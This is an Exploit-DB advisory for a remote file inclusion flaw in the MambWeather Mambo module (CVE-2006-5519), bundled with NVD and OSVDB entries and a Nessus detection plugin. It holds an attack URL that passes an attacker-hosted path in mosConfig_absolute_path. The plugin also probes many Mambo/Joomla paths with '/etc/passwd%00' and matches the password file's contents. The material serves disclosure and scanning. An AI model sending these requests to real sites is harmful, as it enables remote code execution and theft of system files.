ID EDB-ID:2613
Type exploitdb
Reporter h4ntu
Modified 2006-10-22T00:00:00
Description
MambWeather Mambo Module <= 1.8.1 Remote Include Vulnerability. CVE-2006-5519. Webapps exploit for php platform
Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew
Another Mambo module remote inclusion vulneribility
download : http://mamboxchange.com/frs/download.php/1498/MambWeather181.zip
bug found in file : MambWeather/Savant2/Savant2_Plugin_options.php
<?php
/**
* Base plugin class.
*/
global $mosConfig_absolute_path;
require_once $mosConfig_absolute_path.'/modules/MambWeather/Savant2/Plugin.php';
/**
exploit:
http://[site]/[path_to_mambo]/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=[attacker ]
Greetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker@dalnet
# milw0rm.com [2006-10-22]
{"id": "EDB-ID:2613", "hash": "bb44b9c7796835abb16c4316fceed20f", "type": "exploitdb", "bulletinFamily": "exploit", "title": "MambWeather Mambo Module <= 1.8.1 - Remote Include Vulnerability", "description": "MambWeather Mambo Module <= 1.8.1 Remote Include Vulnerability. CVE-2006-5519. Webapps exploit for php platform", "published": "2006-10-22T00:00:00", "modified": "2006-10-22T00:00:00", "cvss": {"vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/", "score": 6.8}, "href": "https://www.exploit-db.com/exploits/2613/", "reporter": "h4ntu", "references": [], "cvelist": ["CVE-2006-5519"], "lastseen": "2016-01-31T16:39:50", "history": [], "viewCount": 1, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/2613/", "sourceData": "Bug Found by h4ntu [http://h4ntu.com] #batamhacker crew\nAnother Mambo module remote inclusion vulneribility\n\ndownload : http://mamboxchange.com/frs/download.php/1498/MambWeather181.zip\n \nbug found in file : MambWeather/Savant2/Savant2_Plugin_options.php\n \n <?php\n\n /**\n * Base plugin class.\n */\n global $mosConfig_absolute_path;\n\n require_once $mosConfig_absolute_path.'/modules/MambWeather/Savant2/Plugin.php';\n\n /**\n\nexploit:\n\nhttp://[site]/[path_to_mambo]/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=[attacker ]\n\nGreetz : Baylaw, Reel, JoySolutions, K-159, SaMuR4i_X, SolpoT, Nugelo, and all #batamhacker@dalnet\n\n# milw0rm.com [2006-10-22]\n", "osvdbidlist": ["29933"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2017-10-19T11:12:34", "references": ["https://www.exploit-db.com/exploits/2613", "https://exchange.xforce.ibmcloud.com/vulnerabilities/29697", "http://www.securityfocus.com/bid/20667", "http://www.vupen.com/english/advisories/2006/4150"], "description": "PHP remote file inclusion vulnerability in Savant2/Savant2_Plugin_options.php in the MambWeather 1.8.1 and earlier component for Mambo allows remote attackers to execute arbitrary PHP code via a URL in the mosConfig_absolute_path parameter.", "edition": 3, "reporter": "NVD", "published": "2006-10-26T12:07:00", "title": "CVE-2006-5519", "type": "cve", "enchantments": {"score": {"modified": "2017-10-19T11:12:34", "vector": "NONE", "value": 7.5}}, "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2006-5519"], "scanner": [], "modified": "2017-10-18T21:29:36", "cpe": ["cpe:/a:mambweather:mambweather:1.8.1"], "id": "CVE-2006-5519", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-5519", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:26", "references": [], "edition": 1, "description": "## Technical Description\nThis vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).\n\nThis may be the same issue as Mosets Tree package (OSVDB 28708) which is included in the MambWeather module.\n## Manual Testing Notes\nhttp://[target]/[path]/modules/MambWeather/Savant2/Savant2_Plugin_options.php?mosConfig_absolute_path=[attacker]\n## References:\n[Secunia Advisory ID:22521](https://secuniaresearch.flexerasoftware.com/advisories/22521/)\nISS X-Force ID: 29697\nGeneric Exploit URL: http://milw0rm.com/exploits/2613\nFrSIRT Advisory: ADV-2006-4150\n[CVE-2006-5519](https://vulners.com/cve/CVE-2006-5519)\nBugtraq ID: 20667\n", "reporter": "OSVDB", "published": "2006-10-22T08:03:55", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "MambWeather for Mambo Savant2_Plugin_options.php mosConfig_absolute_path Variable Remote File Inclusion", "type": "osvdb", "bulletinFamily": "software", "affectedSoftware": [], "cvelist": ["CVE-2006-5519"], "modified": "2006-10-22T08:03:55", "href": "https://vulners.com/osvdb/OSVDB:29933", "id": "OSVDB:29933", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-11-17T03:09:33", "references": ["https://www.securityfocus.com/archive/1/441541/30/0/threaded", "https://www.securityfocus.com/archive/1/444425/30/0/threaded", "https://www.securityfocus.com/archive/1/441538/30/0/threaded", "https://www.securityfocus.com/archive/1/439963/30/0/threaded", "https://isc.sans.edu/diary/Attacks+against+Joomla+com_peoplebook/1526", "https://www.securityfocus.com/archive/1/441533/30/0/threaded", "https://www.securityfocus.com/archive/1/439618/30/0/threaded", "https://www.securityfocus.com/archive/1/439997/30/0/threaded", "https://www.securityfocus.com/archive/1/439035/30/0/threaded", "https://www.securityfocus.com/archive/1/440881/30/0/threaded", "https://www.securityfocus.com/archive/1/439451/30/0/threaded", "https://packetstormsecurity.com/0607-exploits/smf.txt"], "pluginID": "22049", "description": "A third-party component for Mambo, Module, or Joomla! is running on the remote host. At least one of these components is a version that is affected by a remote file include vulnerability due to improper sanitization of user-supplied input to the 'mosConfig_absolute_path' parameter before using it to include PHP code. Provided the PHP 'register_globals' setting is enabled, an unauthenticated, remote attacker can exploit this issue to disclose arbitrary files or execute arbitrary PHP code on the remote host, subject to the privileges of the web server user ID.", "edition": 12, "reporter": "Tenable", "published": "2006-07-15T00:00:00", "title": "Mambo / Joomla! Component / Module 'mosConfig_absolute_path' Multiple Parameter Remote File Include Vulnerabilities", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "CGI abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2007-5412", "CVE-2006-3556", "CVE-2006-5048", "CVE-2006-3846", "CVE-2008-5789", "CVE-2007-5457", "CVE-2006-4270", "CVE-2006-6962", "CVE-2008-5790", "CVE-2006-3750", "CVE-2008-6841", "CVE-2006-3947", "CVE-2007-3130", "CVE-2006-5045", "CVE-2007-2319", "CVE-2010-2918", "CVE-2006-4553", "CVE-2008-0567", "CVE-2006-4288", "CVE-2006-3751", "CVE-2006-4195", "CVE-2006-5519", "CVE-2006-3530", "CVE-2007-2144", "CVE-2006-3773", "CVE-2006-3774", "CVE-2007-1702", "CVE-2006-3980", "CVE-2006-3995", "CVE-2006-3949", "CVE-2007-2005", "CVE-2008-5793", "CVE-2006-4074", "CVE-2006-3748", "CVE-2006-4858", "CVE-2006-4130", "CVE-2006-3749", "CVE-2006-3396", "CVE-2007-5310"], "modified": "2018-11-15T00:00:00", "cpe": ["cpe:/a:joomla:joomla\\!"], "id": "MOSCONFIG_ABSOLUTE_PATH_FILE_INCLUDE.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=22049", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(22049);\n script_version(\"1.109\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_cve_id(\n \"CVE-2006-3396\",\n \"CVE-2006-3530\",\n \"CVE-2006-3556\",\n \"CVE-2006-3748\",\n \"CVE-2006-3749\",\n \"CVE-2006-3750\",\n \"CVE-2006-3751\",\n \"CVE-2006-3773\",\n \"CVE-2006-3774\",\n \"CVE-2006-3846\",\n \"CVE-2006-3947\",\n \"CVE-2006-3949\",\n \"CVE-2006-3980\",\n \"CVE-2006-3995\",\n \"CVE-2006-4074\",\n \"CVE-2006-4130\",\n \"CVE-2006-4195\",\n \"CVE-2006-4270\",\n \"CVE-2006-4288\",\n \"CVE-2006-4553\",\n \"CVE-2006-4858\",\n \"CVE-2006-5045\",\n \"CVE-2006-5048\",\n \"CVE-2006-5519\",\n \"CVE-2006-6962\",\n \"CVE-2007-1702\",\n \"CVE-2007-2005\",\n \"CVE-2007-2144\",\n \"CVE-2007-2319\",\n \"CVE-2007-3130\",\n \"CVE-2007-5310\",\n \"CVE-2007-5412\",\n \"CVE-2007-5457\",\n \"CVE-2008-0567\",\n \"CVE-2008-5789\",\n \"CVE-2008-5790\",\n \"CVE-2008-5793\",\n \"CVE-2008-6841\",\n \"CVE-2010-2918\"\n );\n script_bugtraq_id(\n 18705,\n 18808,\n 18876,\n 18919,\n 18924,\n 18968,\n 18991,\n 19037,\n 19042,\n 19044,\n 19047,\n 19100,\n 19217,\n 19222,\n 19223,\n 19224,\n 19233,\n 19373,\n 19465,\n 19505,\n 19574,\n 19581,\n 19725,\n 20018,\n 20667,\n 23125,\n 23408,\n 23490,\n 23529,\n 24342,\n 25959,\n 26002,\n 26044,\n 27531,\n 28942,\n 30093,\n 32190,\n 32192,\n 32194\n );\n script_xref(name:\"EDB-ID\", value:\"1959\");\n script_xref(name:\"EDB-ID\", value:\"2020\");\n script_xref(name:\"EDB-ID\", value:\"2023\");\n script_xref(name:\"EDB-ID\", value:\"2029\");\n script_xref(name:\"EDB-ID\", value:\"2083\");\n script_xref(name:\"EDB-ID\", value:\"2089\");\n script_xref(name:\"EDB-ID\", value:\"2125\");\n script_xref(name:\"EDB-ID\", value:\"2196\");\n script_xref(name:\"EDB-ID\", value:\"2205\");\n script_xref(name:\"EDB-ID\", value:\"2206\");\n script_xref(name:\"EDB-ID\", value:\"2207\");\n script_xref(name:\"EDB-ID\", value:\"2214\");\n script_xref(name:\"EDB-ID\", value:\"2367\");\n script_xref(name:\"EDB-ID\", value:\"2613\");\n script_xref(name:\"EDB-ID\", value:\"3567\");\n script_xref(name:\"EDB-ID\", value:\"3703\");\n script_xref(name:\"EDB-ID\", value:\"3753\");\n script_xref(name:\"EDB-ID\", value:\"4497\");\n script_xref(name:\"EDB-ID\", value:\"4507\");\n script_xref(name:\"EDB-ID\", value:\"4521\");\n script_xref(name:\"EDB-ID\", value:\"5020\");\n script_xref(name:\"EDB-ID\", value:\"5497\");\n script_xref(name:\"EDB-ID\", value:\"6003\");\n script_xref(name:\"EDB-ID\", value:\"7038\");\n script_xref(name:\"EDB-ID\", value:\"7039\");\n script_xref(name:\"EDB-ID\", value:\"7040\");\n\n script_name(english:\"Mambo / Joomla! Component / Module 'mosConfig_absolute_path' Multiple Parameter Remote File Include Vulnerabilities\");\n script_summary(english:\"Attempts to read a local file using Mambo / Joomla components and modules.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server contains a PHP application that is affected by\nmultiple remote file include vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"A third-party component for Mambo, Module, or Joomla! is running on\nthe remote host. At least one of these components is a version that is\naffected by a remote file include vulnerability due to improper\nsanitization of user-supplied input to the 'mosConfig_absolute_path'\nparameter before using it to include PHP code. Provided the PHP\n'register_globals' setting is enabled, an unauthenticated, remote\nattacker can exploit this issue to disclose arbitrary files or execute\narbitrary PHP code on the remote host, subject to the privileges of\nthe web server user ID.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439035/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439451/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439618/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439963/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/439997/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/440881/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/441533/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/441538/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/441541/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.securityfocus.com/archive/1/444425/30/0/threaded\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packetstormsecurity.com/0607-exploits/smf.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"https://isc.sans.edu/diary/Attacks+against+Joomla+com_peoplebook/1526\");\n script_set_attribute(attribute:\"solution\", value:\n\"Disable the PHP 'register_globals' setting or contact the product's\nvendor to see if an upgrade exists.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Extcalendar RFI\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(94);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/06/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/07/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:joomla:joomla\\!\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2006-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mambo_detect.nasl\", \"joomla_detect.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_require_keys(\"www/PHP\");\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\n# Generate a list of paths to check.\nmambo = get_dirs_from_kb(appname:'mambo_mos', port:port);\nif (isnull(mambo)) mambo = make_list();\n\njoomla = make_list();\njoomla_installs = get_installs(\n app_name : \"Joomla!\",\n port : port\n);\n\nif (joomla_installs[0] == IF_OK)\n{\n foreach install (joomla_installs[1])\n {\n dir = install['path'];\n joomla = make_list(dir, joomla);\n }\n}\n\ndirs = make_list(mambo, joomla);\n\nif (max_index(dirs) == 0)\n audit(AUDIT_WEB_APP_NOT_INST, \"Joomla! / Mambo\", port);\n\n# Vulnerable scripts.\n# - components.\nncoms = 0;\ncom = make_array();\n# - A6MamboCredits\ncom[ncoms++] = \"/administrator/components/com_a6mambocredits/admin.a6mambocredits.php\";\n# - Art*Links\ncom[ncoms++] = \"/components/com_artlinks/artlinks.dispnew.php\";\n# - Chrono Forms\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/PPS/File.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/Writer.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/PPS.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/Writer/BIFFwriter.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/Writer/Workbook.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php\";\ncom[ncoms++] = \"/administrator/components/com_chronocontact/excelwriter/Writer/Format.php\";\n# - Clickheat\ncom[ncoms++] = \"/administrator/components/com_clickheat/install.clickheat.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/includes/heatmap/_main.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/includes/heatmap/main.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/includes/overview/main.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/Recly/Clickheat/Cache.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/Recly/Clickheat/Clickheat_Heatmap.php\";\ncom[ncoms++] = \"/administrator/components/com_clickheat/Recly/common/GlobalVariables.php\";\n# - Community Builder\ncom[ncoms++] = \"/administrator/components/com_comprofiler/plugin.class.php\";\n# - Coppermine Photo Gallery\ncom[ncoms++] = \"/components/com_cpg/cpg.php\";\n# - DBQ Manager\ncom[ncoms++] = \"/administrator/components/com_dbquery/classes/DBQ/admin/common.class.php\";\n# - ExtCalendar\ncom[ncoms++] = \"/components/com_extcalendar/extcalendar.php\";\n# - Feederator\ncom[ncoms++] = \"/administrator/components/com_feederator/includes/tmsp/add_tmsp.php\";\ncom[ncoms++] = \"/administrator/components/com_feederator/includes/tmsp/edit_tmsp.php\";\ncom[ncoms++] = \"/administrator/components/com_feederator/includes/tmsp/subscription.php\";\ncom[ncoms++] = \"/administrator/components/com_feederator/includes/tmsp/tmsp.php\";\n# - Galleria\ncom[ncoms++] = \"/components/com_galleria/galleria.html.php\";\n# - Hashcash\ncom[ncoms++] = \"/components/com_hashcash/server.php\";\n# - HTMLArea3\ncom[ncoms++] = \"/components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php\";\n# - JD-Wiki\ncom[ncoms++] = \"/components/com_jd-wiki/lib/tpl/default/main.php\";\ncom[ncoms++] = \"/components/com_jd-wiki/bin/dwpage.php\";\ncom[ncoms++] = \"/components/com_jd-wiki/bin/wantedpages.php\";\n# - Joomla Flash Uploader\ncom[ncoms++] = \"/administrator/components/com_joomla_flash_uploader/install.joomla_flash_uploader.php\";\ncom[ncoms++] = \"/administrator/components/com_joomla_flash_uploader/uninstall.joomla_flash_uploader.php\";\n# - JoomlaPack\ncom[ncoms++] = \"/administrator/components/com_jpack/includes/CAltInstaller.php\";\n# - Joomla-Visites\ncom[ncoms++] = \"/administrator/components/com_joomla-visites/core/include/myMailer.class.php\";\n# - Link Directory\ncom[ncoms++] = \"/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php\";\n# - LoudMouth\ncom[ncoms++] = \"/components/com_loudmouth/includes/abbc/abbc.class.php\";\n# - Mambatstaff\ncom[ncoms++] = \"/components/com_mambatstaff/mambatstaff.php\";\n# - MambelFish\ncom[ncoms++] = \"/administrator/components/com_mambelfish/mambelfish.class.php\";\n# - Mambo Gallery Manager\ncom[ncoms++] = \"/administrator/components/com_mgm/help.mgm.php\";\n# - Mosets Tree\ncom[ncoms++] = \"/components/com_mtree/Savant2/Savant2_Plugin_textarea.php\";\n# - mp3_allopass\ncom[ncoms++] = \"/components/com_mp3_allopass/allopass.php\";\ncom[ncoms++] = \"/components/com_mp3_allopass/allopass-error.php\";\n# - Multibanners\ncom[ncoms++] = \"/administrator/components/com_multibanners/extadminmenus.class.php\";\n# - PCCookbook\ncom[ncoms++] = \"/components/com_pccookbook/pccookbook.php\";\n# - Peoplebook\ncom[ncoms++] = \"/administrator/components/com_peoplebook/param.peoplebook.php\";\n# - perForms\ncom[ncoms++] = \"/components/com_performs/performs.php\";\n# - phpShop\ncom[ncoms++] = \"/administrator/components/com_phpshop/toolbar.phpshop.html.php\";\n# - PollXT\ncom[ncoms++] = \"/administrator/components/com_pollxt/conf.pollxt.php\";\n# - Recly!Competitions\ncom[ncoms++] = \"/administrator/components/com_competitions/includes/competitions/add.php\";\ncom[ncoms++] = \"/administrator/components/com_competitions/includes/competitions/competitions.php\";\ncom[ncoms++] = \"/administrator/components/com_competitions/includes/settings/settings.php\";\n# - Remository\ncom[ncoms++] = \"/administrator/components/com_remository/admin.remository.php\";\n# - rsGallery\ncom[ncoms++] = \"/components/com_rsgallery2/rsgallery2.php\";\ncom[ncoms++] = \"/components/com_rsgallery2/rsgallery2.html.php\";\n# - Security Images\ncom[ncoms++] = \"/administrator/components/com_securityimages/configinsert.php\";\ncom[ncoms++] = \"/administrator/components/com_securityimages/lang.php\";\n# - Serverstat\ncom[ncoms++] = \"/administrator/components/com_serverstat/install.serverstat.php\";\n# - SiteMap\ncom[ncoms++] = \"/components/com_sitemap/sitemap.xml.php\";\n# - SMF Forum\ncom[ncoms++] = \"/components/com_smf/smf.php\";\n# - Taskhopper\ncom[ncoms++] = \"/components/com_thopper/inc/contact_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/itemstatus_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/projectstatus_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/request_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/responses_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/timelog_type.php\";\ncom[ncoms++] = \"/components/com_thopper/inc/urgency_type.php\";\n# - User Home Pages\ncom[ncoms++] = \"/administrator/components/com_uhp/uhp_config.php\";\ncom[ncoms++] = \"/administrator/components/com_uhp2/footer.php\";\n# - VideoDB\ncom[ncoms++] = \"/administrator/components/com_videodb/core/videodb.class.xml.php\";\n# - WmT Portfolio\ncom[ncoms++] = \"/administrator/components/com_wmtportfolio/admin.wmtportfolio.php\";\n# - modules.\nnmods = 0;\nmod = make_array();\n# - Autostand\nmod[nmods++] = \"/mod_as_category.php\";\nmod[nmods++] = \"/mod_as_category/mod_as_category.php\";\n# - FlatMenu\nmod[nmods++] = \"/mod_flatmenu.php\";\n# - MambWeather\nmod[nmods++] = \"/MambWeather/Savant2/Savant2_Plugin_options.php\";\n\n\n# Loop through each directory.\ninfo = \"\";\ncontents = \"\";\nforeach dir (list_uniq(dirs))\n{\n # Try to exploit the flaw to read a file.\n file = \"/etc/passwd%00\";\n for (i=0; i<ncoms; i++)\n {\n w = http_send_recv3(\n method : \"GET\",\n item : dir + com[i] + \"?mosConfig_absolute_path=\" + file,\n port : port,\n exit_on_fail : TRUE\n );\n res = strcat(w[0], w[1], '\\r\\n', w[2]);\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"\\(/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"\\(/etc/passwd\\).*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + com[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n {\n contents = strstr(res, '\\r\\n\\r\\n') - '\\r\\n\\r\\n';\n if (\"<br\" >< contents) contents = contents - strstr(contents, \"<br\");\n }\n\n if (!thorough_tests) break;\n }\n }\n if (info && !thorough_tests) break;\n\n for (i=0; i<nmods; i++)\n {\n w = http_send_recv3(\n method : \"GET\",\n item : dir + \"/modules/\" + mod[i] + \"?mosConfig_absolute_path=\" + file,\n port : port,\n exit_on_fail : TRUE\n );\n res = strcat(w[0], w[1], '\\r\\n', w[2]);\n\n # There's a problem if...\n if (\n # there's an entry for root or...\n egrep(pattern:\"root:.*:0:[01]:\", string:res) ||\n # we get an error saying \"failed to open stream\".\n egrep(pattern:\"\\(/etc/passwd\\\\0.+ failed to open stream\", string:res) ||\n # we get an error claiming the file doesn't exist or...\n egrep(pattern:\"\\(/etc/passwd\\).*: failed to open stream: No such file or directory\", string:res) ||\n # we get an error about open_basedir restriction.\n egrep(pattern:\"main.+ open_basedir restriction in effect. File\\(/etc/passwd\", string:res)\n )\n {\n info = info +\n \" \" + dir + \"/modules/\" + mod[i] + '\\n';\n\n if (!contents && egrep(string:res, pattern:\"root:.*:0:[01]:\"))\n {\n contents = strstr(res, '\\r\\n\\r\\n') - '\\r\\n\\r\\n';\n if (\"<br\" >< contents) contents = contents - strstr(contents, \"<br\");\n }\n\n if (!thorough_tests) break;\n }\n }\n if (info && !thorough_tests) break;\n}\n\nif (info)\n{\n if (empty_or_null(contents)) contents = 'The response output includes an error message which indicates that the installed component is affected. Below is the response : \\n\\n' + res;\n\n security_report_v4(\n port : port,\n severity : SECURITY_WARNING,\n file : \"/etc/passwd\",\n request : split(info),\n output : contents,\n attach_type : 'text/plain'\n );\n exit(0);\n}\nelse\n exit(0, \"No affected components were found on the web server on port \"+port+\".\");\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}]}
